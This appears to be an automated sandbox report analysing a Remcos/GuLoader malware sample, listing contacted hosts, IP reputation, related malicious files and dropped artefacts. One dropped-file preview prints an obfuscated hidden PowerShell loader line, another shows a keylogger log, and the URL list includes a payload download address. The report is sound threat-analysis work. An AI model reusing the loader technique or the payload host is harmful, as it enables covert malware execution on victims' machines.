                              https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.3049075645.00000000047F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://contoso.com/powershell.exe, 00000002.00000002.3051799835.0000000005855000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.3051799835.0000000005855000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://geoplugin.net/json.gplRxwab.exe, 00000009.00000002.3393823082.00000000087B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://geoplugin.net/json.gpalwab.exe, 00000009.00000002.3393823082.00000000087B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.google.com/accounts/serviceloginwab.exefalse
                                    high
                                    https://login.yahoo.com/config/loginwab.exefalse
                                      high
                                      http://www.nirsoft.net/wab.exe, 0000000C.00000002.3085535723.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                        high
                                        http://geoplugin.net/json.gp)mwab.exe, 00000009.00000002.3393823082.00000000087CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.3049075645.00000000047F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://geoplugin.net/json.gpmmwab.exe, 00000009.00000002.3393823082.00000000087CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://209.90.234.58/fGuGZ105.binPwab.exe, 00000009.00000002.3393823082.00000000087B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.ebuddy.comwab.exe, wab.exe, 0000000C.00000002.3085535723.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          172.93.222.147
                                          unknownUnited States
                                          23033WOWUStrue
                                          209.90.234.58
                                          unknownUnited States
                                          136175SERVERHOSH-AS-APServerhoshInternetServiceNLfalse
                                          178.237.33.50
                                          geoplugin.netNetherlands
                                          8455ATOM86-ASATOM86NLfalse
                                          Joe Sandbox version:40.0.0 Tourmaline
                                          Analysis ID:1439568
                                          Start date and time:2024-05-10 14:20:12 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 8m 14s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:13
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:Palmebladstag.exe
                                          Detection:MAL
                                          Classification:mal100.phis.troj.spyw.evad.winEXE@14/64@1/3
                                          EGA Information:
                                          • Successful, ratio: 83.3%
                                          HCA Information:
                                          • Successful, ratio: 98%
                                          • Number of executed functions: 223
                                          • Number of non-executed functions: 244
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target powershell.exe, PID 5916 because it is empty
                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                          TimeTypeDescription
                                          14:21:08API Interceptor44x Sleep call for process: powershell.exe modified
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          178.237.33.502024090533201.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          • geoplugin.net/json.gp
                                          JaXXnpJZ3z.exeGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                          • geoplugin.net/json.gp
                                          payment_0045k.xlsGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                          • geoplugin.net/json.gp
                                          License authorization Custom invoice INFO - Factura Aduana INFO (2).xlsGet hashmaliciousRemcos, PrivateLoaderBrowse
                                          • geoplugin.net/json.gp
                                          #U00dcberpr#U00fcfen Sie Ihre_INV-2087_A97OPY7R#4DE688II65-DHL.scr.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                          • geoplugin.net/json.gp
                                          IW7w68n6vf.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                          • geoplugin.net/json.gp
                                          5bsgSbGQhc.rtfGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                          • geoplugin.net/json.gp
                                          AWB JGS-002-20240507 DOCUNMENTS.exeGet hashmaliciousPrivateLoader, RemcosBrowse
                                          • geoplugin.net/json.gp
                                          z43ISFFORMHBLDRAFTTHBL53164US7272Coscoline.exeGet hashmaliciousGuLoader, RemcosBrowse
                                          • geoplugin.net/json.gp
                                          thelevel.docGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                          • geoplugin.net/json.gp
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          geoplugin.net2024090533201.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 178.237.33.50
                                          JaXXnpJZ3z.exeGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                          • 178.237.33.50
                                          payment_0045k.xlsGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                          • 178.237.33.50
                                          License authorization Custom invoice INFO - Factura Aduana INFO (2).xlsGet hashmaliciousRemcos, PrivateLoaderBrowse
                                          • 178.237.33.50
                                          #U00dcberpr#U00fcfen Sie Ihre_INV-2087_A97OPY7R#4DE688II65-DHL.scr.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                          • 178.237.33.50
                                          IW7w68n6vf.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                          • 178.237.33.50
                                          5bsgSbGQhc.rtfGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                          • 178.237.33.50
                                          AWB JGS-002-20240507 DOCUNMENTS.exeGet hashmaliciousPrivateLoader, RemcosBrowse
                                          • 178.237.33.50
                                          z43ISFFORMHBLDRAFTTHBL53164US7272Coscoline.exeGet hashmaliciousGuLoader, RemcosBrowse
                                          • 178.237.33.50
                                          thelevel.docGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                          • 178.237.33.50
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          WOWUSiLtmjGYdlRC3T7i.exeGet hashmaliciousNanocore, PureLog StealerBrowse
                                          • 192.169.69.26
                                          Personkarakteristikken.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 172.93.222.220
                                          z22FATCS24_8566_Original.exeGet hashmaliciousGuLoader, RemcosBrowse
                                          • 192.169.69.26
                                          DECLERATION-OF-CONFORMITY.exeGet hashmaliciousGuLoader, RemcosBrowse
                                          • 192.169.69.26
                                          4202-HEM-201_EGY_site 912_IRB Annual Renewal Approval_05MAY-24.exeGet hashmaliciousGuLoader, RemcosBrowse
                                          • 192.169.69.26
                                          Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                          • 192.169.69.26
                                          Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                          • 192.169.69.26
                                          PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                          • 192.169.69.26
                                          documento.exeGet hashmaliciousGuLoader, RemcosBrowse
                                          • 192.169.69.26
                                          LUMEN3547583853959599359959359Cercospora.batGet hashmaliciousGuLoader, RemcosBrowse
                                          • 192.169.69.26
                                          ATOM86-ASATOM86NL2024090533201.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 178.237.33.50
                                          JaXXnpJZ3z.exeGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                          • 178.237.33.50
                                          payment_0045k.xlsGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                          • 178.237.33.50
                                          License authorization Custom invoice INFO - Factura Aduana INFO (2).xlsGet hashmaliciousRemcos, PrivateLoaderBrowse
                                          • 178.237.33.50
                                          #U00dcberpr#U00fcfen Sie Ihre_INV-2087_A97OPY7R#4DE688II65-DHL.scr.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                          • 178.237.33.50
                                          IW7w68n6vf.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                          • 178.237.33.50
                                          5bsgSbGQhc.rtfGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                          • 178.237.33.50
                                          AWB JGS-002-20240507 DOCUNMENTS.exeGet hashmaliciousPrivateLoader, RemcosBrowse
                                          • 178.237.33.50
                                          z43ISFFORMHBLDRAFTTHBL53164US7272Coscoline.exeGet hashmaliciousGuLoader, RemcosBrowse
                                          • 178.237.33.50
                                          thelevel.docGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                          • 178.237.33.50
                                          SERVERHOSH-AS-APServerhoshInternetServiceNL01-05-24 remittance.exeGet hashmaliciousGuLoaderBrowse
                                          • 209.90.233.2
                                          87tBuE42ft.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 209.90.234.20
                                          http://213.139.205.131/update_verGet hashmaliciousUnknownBrowse
                                          • 213.139.205.131
                                          http://213.139.205.131/w_ver.datGet hashmaliciousUnknownBrowse
                                          • 213.139.205.131
                                          http://213.139.205.131/update_verGet hashmaliciousUnknownBrowse
                                          • 213.139.205.131
                                          ReleaseEvans#27.docmGet hashmaliciousUnknownBrowse
                                          • 213.139.205.131
                                          Application#89.docmGet hashmaliciousUnknownBrowse
                                          • 213.139.205.131
                                          ReleaseEvans#90.docmGet hashmaliciousUnknownBrowse
                                          • 213.139.205.131
                                          qvX9Cyuqyq.exeGet hashmaliciousPureLog Stealer, Vidar, XmrigBrowse
                                          • 213.139.207.234
                                          G0k5A7CSy7.exeGet hashmaliciousPureLog Stealer, XmrigBrowse
                                          • 213.139.207.234
                                          No context
                                          No context
                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):144
                                          Entropy (8bit):3.379519383183141
                                          Encrypted:false
                                          SSDEEP:3:rhlKlFMfUlRlGlTlCl55JWRal2Jl+7R0DAlBG45klovDl6v:6laUlDGlpCl55YcIeeDAlOWAv
                                          MD5:ACAC5BBB81831B32B685EF6AFF834858
                                          SHA1:C04CA3C45FC92DE63908007A6F83A77344821289
                                          SHA-256:5424A95C5EFCB856577240A5DBDCE02850FE1D69571BC1390894F9E2BEF403E3
                                          SHA-512:60732DE87DF3C3B649F51ECF816636D5BFDDEA808F254D5689029CE72A61EE4099D56C8E8F7AF311CF21848D134D5465348CC44BFE31EDF173E35AA95346BD31
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                          Reputation:low
                                          Preview:....[.2.0.2.4./.0.5./.1.0. .1.4.:.2.2.:.3.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):931
                                          Entropy (8bit):4.9927385330017415
                                          Encrypted:false
                                          SSDEEP:12:tkl7pGndToCsGkMyGWKyGXPVGArwY3P+aoHDGdAPORkoao9W7im51w7CN9jF6xIZ:ql0dT/NuKyGX85y266m7WAxZ0
                                          MD5:A35784E6EDFEE5A9C3A455014A8773E4
                                          SHA1:AD0560D88BDA5CFC8FE832E31379332DF5759623
                                          SHA-256:A2D61F1C26B446108F6FEC902AA9D70D0AD50A7FD879645153370380863492C0
                                          SHA-512:11797BD7063C3C3683DD3A2682DB7150C5950EC0EDC0AF0E9199486BD6DCD5B5C73D0FF09B917CD638A9F255EE77B64BFCE95C000260572836423BC946775509
                                          Malicious:false
                                          Reputation:low
                                          Preview:{. "geoplugin_request":"81.181.62.34",. "geoplugin_status":206,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"",. "geoplugin_region":"",. "geoplugin_regionCode":"",. "geoplugin_regionName":"",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"",. "geoplugin_countryCode":"CH",. "geoplugin_countryName":"Switzerland",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"EU",. "geoplugin_continentName":"Europe",. "geoplugin_latitude":"47.1449",. "geoplugin_longitude":"8.1551",. "geoplugin_locationAccuracyRadius":"1000",. "geoplugin_timezone":"Europe\/Zurich",. "geoplugin_currencyCode":"CHF",. "geoplugin_currencySymbol":"CHF",. "geoplugin_currencySymbol_UTF8":"CHF",. "geoplugin_currencyConverter":0.9067.}
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):8003
                                          Entropy (8bit):4.838950934453595
                                          Encrypted:false
                                          SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                                          MD5:4C24412D4F060F4632C0BD68CC9ECB54
                                          SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                                          SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                                          SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):227
                                          Entropy (8bit):5.09361548369821
                                          Encrypted:false
                                          SSDEEP:6:HHfBJtx5xExM0FDjAuN723fxbmgtBaTg3H5L/z9itiCj:H/BbFKN8uaZbmycT8H5rz9itiCj
                                          MD5:5BD84D76642EF70C948559981CCD1CB3
                                          SHA1:9D5AECE98E74289371276C6C2F7046848CE01CBB
                                          SHA-256:C7DAB8BB3A9C034272A1AF37102DF1BC2D09105E4DE026121F5396A85A6F4481
                                          SHA-512:AC9EDABEEAAA3D561AE8DE28E41E2A01292DD8246EB53B72C888900EC0816E9960BED3D5D558F7E4ED3D3AA288C88BBBB9F89398E376CBA84215BB86C5407DC1
                                          Malicious:false
                                          Preview:[Ini App]..Load="-windowstyle hidden ; $Tangsnarrerne=Get-Content 'C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Menneskeliggrelsens.Lyn';$Ebeneous122=$Tangsnarrerne.SubString(52669,3);.$Ebeneous122($Tangsnarrerne)"..
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                          Category:dropped
                                          Size (bytes):2
                                          Entropy (8bit):1.0
                                          Encrypted:false
                                          SSDEEP:3:Qn:Qn
                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                          Malicious:false
                                          Preview:..
                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                          File Type:Extensible storage user DataBase, version 0x620, checksum 0x48a80eb4, page size 32768, DirtyShutdown, Windows version 10.0
                                          Category:dropped
                                          Size (bytes):15728640
                                          Entropy (8bit):0.10104014649099108
                                          Encrypted:false
                                          SSDEEP:1536:2SB2jpSB2jFSjlK/sw/ZweshzbOlqVqNes3zbtzbheszO/ZklMes1:2a6aCUueqUW9A6d
                                          MD5:E796721168B5A15288B11EA0CF3FEAD1
                                          SHA1:370A6B25D747D53E95DC4E42C0CE76E8F9C85748
                                          SHA-256:6D7692842AC335C0F73B9FB100338D6895F6160197337695DC188F1D616E7461
                                          SHA-512:0740529F4959CD2C9354B304C75EF4C8EDBF70F0C8D48076EBA95A7FFF171D07ECF67ABFEBFF48C28CCD17949D3F26CC381B60179B567B864360C2D09D2A6F46
                                          Malicious:false
                                          Preview:H...... ...................':...{........................T.....8+...{...,...{G.h.V.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{.......................................,...{G......................,...{G..........................#......h.V.....................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3976
                                          Entropy (8bit):4.763745814576054
                                          Encrypted:false
                                          SSDEEP:96:Yq6mlF7rOoE7cp+0XbmbJPsn3yvH63o1Ime:YeC/7mXSbgyvaX
                                          MD5:09FB3F1C0CBD1B9354B19A498B36C110
                                          SHA1:0D7A2CA217DF81AFE7F61AB382157CCA48EAC0B9
                                          SHA-256:714075D0699CE111C46E860AA45ECB066718178354CB43F9EE8B6B7EE428D0CC
                                          SHA-512:3B809FD57D159D7F74D03E8BD48FF46AAEC25CFD836FA9629C3847EB17E7E48EA3B00F6F4BA572690805E2F50060CA5D825F85245EFEB812E91793BE07982812
                                          Malicious:false
                                          Preview:...............N.....c..pq...6...H.W.....|........K.M...=......E...+.....j....\}................7......9.....".......H.....P.&....d.....A../.e...*....................v.......E.i..]......o.y......F.N........?.......t...X..........0.......&.....M.........Y......HY.!..d.........?........C.........m...p.......-...JL........J..........r............q...S)..........A.......p..................M.\..s.JI....U.....3.......5......................5;........5....a.....R5.........0.\...........*nJ...?.GJ...c............>/......Y*.'....]....MW.....s..........:....WS..s.....$G..l.W*..............h.;.L........V..m.....(.......\S..L..s....`.3b...D.+..L.....V,.4I/....g....).Sm.... ...K......]UU....................I.....g...f....]E.......D...i..............e..2..........!...-......f.......*....;................~C....6..8..;.........i...F..a.k.$D...4......o9..<!..&JFb..|.....}..............4..........V.)q.....................Z......PT.9....).I.....:............C.............\....3...d.e....v.A.....<......
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3335
                                          Entropy (8bit):4.717434214432263
                                          Encrypted:false
                                          SSDEEP:48:MAcJPcNinrPIG43slLuWuXDX46UPSdyqRR58hxs4zkM/yiG00APoc3:RcJPc4rwG43QuLsYyqRROhxsYr/nn3
                                          MD5:2F512CA7636881425D9A91BAEBFB09C7
                                          SHA1:F82B96C6E88963AF8A6723AA0D62C5256B7C72BC
                                          SHA-256:1D95005359267F8E6D19B3AD2ED6134A86F3523C4CEFD1AF0FC50E2BD4A14383
                                          SHA-512:DBB4C1BC8A9AF99AFE912289AB946455B4017311949DB8802EB380F7C2B00FA279CE44BBAD4072BC640AFEE26525564356E309DA878EFE57DFCBC36E5AAA113C
                                          Malicious:false
                                          Preview:.UN........'.........Y..O.T{.Z;...........+.........'.....*......x.?....2w....m.......T...K?.......F.................r......r....>.....A........S.....................O...X......Y.]...<.7.......2.g......2.w..o.........P..................*...........)....O........KT......D...E...:..v..w...s.....M..._;..i..%.=....J...)...l....:v.|...........p.v........qX....[l.<....\...>......i..G......F....A.....p..u............"....C.Y..P............p........u.....f......1...8.....Z...L.......Y..j.D...................:.....=#.j.............m......H........o........C7.....u.....g....X.A.........N.....A.J..........o...Z........k..H...a...b.....C...Q..X..s...t...9..........j.....&.................B.........._......K....?...n....m..M....2.....Y..............V.....4..."....N........K..........g...P.........x..#.pU......o.......8.a7..........]....;.......O.2.............@.....:..^-.x/I....1.....$.......y..\....H^...n..r..>.......I..........'.....................B.....q..........D.,f.........m..
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1116
                                          Entropy (8bit):4.84185645633952
                                          Encrypted:false
                                          SSDEEP:24:GoRf6bZ4VNVhM1InmGoRj/V7/nPG9tJlf2+q1hxGXt:GoRf6bGrvM1VRTdPG9tJ+x+
                                          MD5:14F72D2C643CEF8D2564CCC6CC3CAD64
                                          SHA1:753CE7CB01DCA6C4F964F0ECFDE73A7446B7EBE5
                                          SHA-256:90EFB6AFB5489C66B8192BDC4150F49F61629B750BF3163F12E5F7B05AD00588
                                          SHA-512:17379F99E99659EE471CAF94C417D768C390673B39F7A58E66E85B0C9C57A30EC9E9736C7EA8CE63E3DF81ABFBE87CEB9E06898C9C9D1EC24E9ADF3AA1379602
                                          Malicious:false
                                          Preview:A^........P.......u................................b.?.y...8P...2.c-........e>.....#...`..V.....I.........i..G......^...v.A...............o'U....-'...j.........7.....".....ML..%38.......s............v7.T.L....h[..Q...q...J....>..]Z...........P.......4....{........P.o....H.d.Q..f....`............................Y...............,..7.H....].....Q7.T.I..j.............*.N.M.......8...................J[......p.....E.........|.b..4D7.:.,..............~....k.4.<..........C..B.C.........%}.)...<....*.@...t .K....bw.~.........M!.....O......K}..~................c...H.I.................zX...\............G...`.......,...............b..o...TY....B....7.............c..U.......s{...........c4.....p.c.^.......cs.....K.>.....S...l...........C.7...............F........K^.k........w........F...................C...!........................&J.7Q......h.....2n....@.......r..................w....s.......y.....T}..............*..[..........m.............c..2$[.M....;>y.......m......bk<........
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:DOS executable (COM)
                                          Category:dropped
                                          Size (bytes):2690
                                          Entropy (8bit):4.63512996913884
                                          Encrypted:false
                                          SSDEEP:48:C5G42ZakXKDzug5OXczR8OhhMiThLUtdNbxJ8kepi76tvGDbB9:C8ZagXKhhZBUBxJ0vGDbB9
                                          MD5:ACB8CF2FA98CD993D20422E6142C5322
                                          SHA1:5847CF78C44DFDBE89DA389D2DE40BA5328DB9C6
                                          SHA-256:9946D01E16BC21354585E00399BC6A513E1E2F85DC5A6B033D0AA614017216F4
                                          SHA-512:7936A659492CD225F380392A7A3DB29AC2D52A3A48C6378BA17DF5F8E0A6CA6C1C482EFFE0B2529335259E1399C38D003F7F8E9349B4C25688FDB0610C9CC425
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                          Preview:....."F........J........D.5n........x.....3q@.....+.........8.....f......&....Id...../.q.....t......Q.........+.<..........L....'..@...z...........T.....ZzzP....R.5....#..8.....F.....................Y......................O.5............am....."......&...2......}......p......).....K...l......k.....j..............oG.............s.....D..........2.a;m....w..........b.......a..~..........R%..._.....i......D......{-..vw..5..gX?.....N..Q|. ..."............ .........%..n..............I.._...$s..S......f0..........<.........u...........a..............o!..........(.../.............&.$..8.-..@...._................*....m..Y..........Q.]m................ZV...0$.".C*................E........... H........z............$.. .....W.D.......k...@.............~U5..\..........>........ko.........bIy.,Yo.9....[...Q.....xi...................}.k.......a).^7...V...........{.....?.\.......v.....8U.NJ4 .@...Dz.............k..........H.j...).....>..............................2...............3:.ch........
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1417
                                          Entropy (8bit):4.683538256806178
                                          Encrypted:false
                                          SSDEEP:24:nsucYE4Tm69NHOcMCl6wOlNgyGUm39bZTEMzAs4Dv7svDmPZM6wiMJuUzjk:nsTYE4Tm6rHOcNceUCh/csGvYvDZIMJi
                                          MD5:7958D8C8FE86D576685CFCBABBE59F6E
                                          SHA1:1284F7308B7F1ACD56EAE071F26F90C721BBF548
                                          SHA-256:167B0132126F03535C2BB6157E1652A8CA646C7369850F3C5DE23A8CCD9B4CD0
                                          SHA-512:68FC4D5A7A5565423CC29BF1C571F11FD363E4527399FC720832576AD6A2CCB817DF94D29539C5AE93C5BFB3DC2B0D753CBAFD2837E97D639B18AC4984FA21D3
                                          Malicious:false
                                          Preview:.)....."........L-......9.{.......d$...|..I......w9."...c......[......C<...gWSK.....................a...p.....*.......6 ............#...3...........)................Il.......n........D....2...}................<......=...3.......3...p8.n.......!....\.....?...Oa...........9 4..............1.X.....$...1..K..........+..$...............8.........m....z..mv...f...2...jL....;J............p.(.n...........@.....".....-..................#.........h...y.....2-..mT...............j.M....j............f. ............?..(.........z..............U...C...T....]n..t...A_.G....b..........w........................... .iw...q.y.if...H...4..............K.......|.......b...m..............8............o............\..x.b..<..9A........................%....zh..I..p.............;.......%..!T...............8...^..c.....2...{c........Y.3..v.|..........1.......4......)........z.......O....-.f.....NM9(....3...\...l...'..j...S.....B...%.}.hjB[.......D................q......Q.-.>.<........8...........c/.M...
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2806
                                          Entropy (8bit):4.795743358426778
                                          Encrypted:false
                                          SSDEEP:48:aNO8gT7dihzbO2NlKopiIcUG6nip9MYjk5TSpFVo7D/FIAM8Q5+yPuM:aMTqzbDNlKIHG6o93jYTSpFOD9IARvrM
                                          MD5:213F9DBCAF6E45EB16E383CE260A062E
                                          SHA1:6813B331D37C864CAABB5D912DFC88138365E3F9
                                          SHA-256:55D15C32763EC299052CF44A7525EBCCB52FD8FE33C43EBC7784E5290702B9A2
                                          SHA-512:ABEAA8485D109C33CC84F341466FF6670A3BC6E25C370D226D61CDFAA8C101A2340713B96E28CC0F68AA1FB6AA4013D6ADAE1B33F4D9EDDBC39D05FDF917BC94
                                          Malicious:false
